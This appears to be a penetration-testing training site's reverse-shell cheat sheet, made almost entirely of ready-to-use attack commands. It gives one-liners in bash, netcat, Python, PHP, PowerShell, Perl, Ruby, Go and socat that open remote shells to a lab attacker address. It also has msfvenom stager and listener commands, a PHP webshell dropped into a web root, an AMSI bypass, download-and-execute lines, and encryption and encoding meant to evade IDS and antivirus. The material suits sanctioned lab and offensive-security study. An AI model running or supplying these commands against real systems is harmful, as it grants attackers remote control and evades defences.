Back to All Modules

Reverse Shells Cheat Sheet

#BASH

# 1. Basic /dev/tcp (most common)
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

# 2. Alternative syntax
exec 5<>/dev/tcp/10.10.14.5/4444; cat <&5 | while read line; do $line 2>&5 >&5; done

# 3. Named pipe
bash -c 'exec bash -i &>/dev/tcp/10.10.14.5/4444 <&1'

# 4. sh -i variant
0<&196;exec 196<>/dev/tcp/10.10.14.5/4444; sh <&196 >&196 2>&196

# 5. /bin/bash explicit
/bin/bash -l > /dev/tcp/10.10.14.5/4444 0<&1 2>&1

# URL-encoded bash
bash+-i+>%26+/dev/tcp/10.10.14.5/4444+0>%261
BASH

#NETCAT (NC)

# Traditional Netcat (-e flag)
nc -e /bin/sh 10.10.14.5 4444
nc -e /bin/bash 10.10.14.5 4444
nc -e /usr/bin/bash 10.10.14.5 4444

# OpenBSD Netcat (no -e flag)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.5 4444 > /tmp/f

# Named pipe + netcat combination
mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc 10.10.14.5 4444 1>/tmp/backpipe
BASH

#PYTHON

# Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Python 3 (compact)
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.5",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

# Python 3 (single line, pty)
python3 -c '__import__("os").dup2(__import__("socket").socket().__init__().__class__.create_connection(("10.10.14.5",4444)).fileno(),0);__import__("os").dup2(0,1);__import__("os").dup2(0,2);__import__("pty").spawn("/bin/bash")'

# Python 2 (legacy)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
BASH

#PHP

# PHP exec
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# PHP shell_exec
php -r '$sock=fsockopen("10.10.14.5",4444);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

# PHP system
php -r '$sock=fsockopen("10.10.14.5",4444);system("/bin/sh -i <&3 >&3 2>&3");'

# PHP passthru
php -r '$sock=fsockopen("10.10.14.5",4444);passthru("/bin/sh -i <&3 >&3 2>&3");'

# PHP reverse shell (inline, short)
php -r '$sock=fsockopen("10.10.14.5",4444);$proc=proc_open("sh",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'

# PHP webshell one-liner (write to file)
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/cmd.php
echo '<?php exec("/bin/bash -c \"bash -i >& /dev/tcp/10.10.14.5/4444 0>&1\""); ?>' | tee /var/www/html/rev.php
BASH

#POWERSHELL

# AMSI bypass prefix — run this BEFORE any PowerShell payload on targets with Defender:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
POWERSHELL
# ConPtyShell (Windows 10 1809+) — fully interactive terminal:
# Attacker: stty raw -echo; (stty size; cat) | nc -lvnp 4444
# Target: IEX(IWR http://10.10.14.5/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.5 4444
POWERSHELL
# 1. Basic TCP (PowerShell)
powershell -c "$client=New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# 2. PowerCat (if available)
powercat -c 10.10.14.5 -p 4444 -e cmd.exe

# 3. Nishang Invoke-PowerShellTcp (file-based)
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 4444

# 4. Encoded (base64) variant
$cmd='...'; $enc=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
powershell -enc $enc

# 5. ConPty variant (better term)
powershell -c "IEX(IWR http://10.10.14.5/ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.5 4444"
POWERSHELL

#PERL

# Perl reverse shell (Linux)
perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Perl (Windows)
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr=>"10.10.14.5:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
BASH

#RUBY

# Ruby reverse shell
ruby -rsocket -e'f=TCPSocket.open("10.10.14.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Ruby (no -rsocket)
ruby -e 'require "socket";exit if fork;c=TCPSocket.new("10.10.14.5","4444");loop{c.gets.chomp!;(c.puts(`$_`) rescue nil);}'
BASH

#GOLANG

# Golang reverse shell
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.10.14.5:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/rev.go && go run /tmp/rev.go
BASH

#SOCAT

# Socat reverse shell (Linux)
socat TCP:10.10.14.5:4444 EXEC:/bin/bash
socat TCP:10.10.14.5:4444 EXEC:/bin/sh,pty,stderr,setsid,sigint,sane

# Socat listener (attacker)
socat file:`tty`,raw,echo=0 TCP-L:4444

# Socat reverse shell (Windows)
socat.exe TCP:10.10.14.5:4444 EXEC:cmd.exe,pipes

# Encrypted socat (both sides)
# Attacker: socat OPENSSL-LISTEN:4444,cert=bind.pem,verify=0,fork STDOUT
# Target: socat OPENSSL:10.10.14.5:4444,verify=0 EXEC:/bin/bash
BASH

#MSFVENOM STAGERS

# Linux ELF binary
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell_x86.elf

# Linux (shell command string)
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.5 LPORT=4444 -f raw

# Windows EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell_x86.exe

# Windows DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o shell.dll

# Web payloads (PHP, JSP, WAR, ASP)
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.jsp
msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f asp -o shell.asp
msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.14.5 LPORT=4444

# Python / NodeJS / macOS
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.5 LPORT=4444 -f raw
msfvenom -p nodejs/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444
msfvenom -p osx/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f macho -o shell.macho

# Stage-less vs staged (-p cmd/unix/reverse_bash vs -p linux/x64/meterpreter_reverse_tcp)
# "_" after shell = stage-less (e.g., shell_reverse_tcp vs shell/reverse_tcp)
BASH

#SHELL UPGRADE / TTY STABILIZATION

# 1. Python pty (most common)
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# 2. Full sequence (after pty)
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z                    # background netcat shell
stty raw -echo; fg        # in YOUR terminal, then press Enter
export TERM=xterm
export SHELL=bash
stty rows 59 columns 235  # set your terminal size

# 3. Script command (if python missing)
/usr/bin/script -qc /bin/bash /dev/null
script /dev/null -c bash

# 4. rlwrap (attacker side, before connecting)
rlwrap nc -lvnp 4444
# then after shell: Ctrl+Z, stty raw -echo; fg

# 5. Socat full TTY (requires socat on target)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.5:4444

# 6. Set terminal rows/cols after upgrade
stty -a             # check your local terminal size
stty rows X columns Y
BASH

#MSFCONSOLE LISTENER + HANDLER

# Start msfconsole multi/handler
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; exploit"

# Inside msfconsole
use multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
set ExitOnSession false
exploit -j                         # run as background job
sessions -l                        # list sessions
sessions -i 1                      # interact with session 1

# Auto-run scripts on connect
set AutoRunScript post/windows/manage/migrate
set AutoRunScript post/multi/manage/autoroute subnet=10.10.10.0 netmask=255.255.255.0
BASH

#QUICK SHELL TEST / CONNECTIVITY CHECK

# Ping test
target: ping -c 1 10.10.14.5

# Port connectivity test (bash)
target: timeout 3 bash -c 'echo >/dev/tcp/10.10.14.5/4444' && echo "open" || echo "blocked"

# Port connectivity test (curl)
target: curl http://10.10.14.5:8000/test.txt

# Start simple HTTP server to test connectivity
attacker: python3 -m http.server 8000
BASH

#ENCRYPTED SHELLS (TLS/SSL)

# Encrypted shells (avoid IDS inspection):
ncat --ssl -lvnp 4444                                    # ncat SSL listener
socat openssl-listen:4444,reuseaddr,fork EXEC:cmd.exe    # socat SSL Windows
socat openssl-listen:4444,reuseaddr,fork EXEC:/bin/bash  # socat SSL Linux
BASH

#MODERN SHELL TOOLS

# pwncat-cs — auto-stabilization + session management
pwncat-cs -lp 4444  # auto-stabilization + session management
BASH

#MSFVENOM EVASION

# msfvenom with encoder and iterations for AV evasion:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -e x64/zutto_dekiru -i 3 -o shell.exe
BASH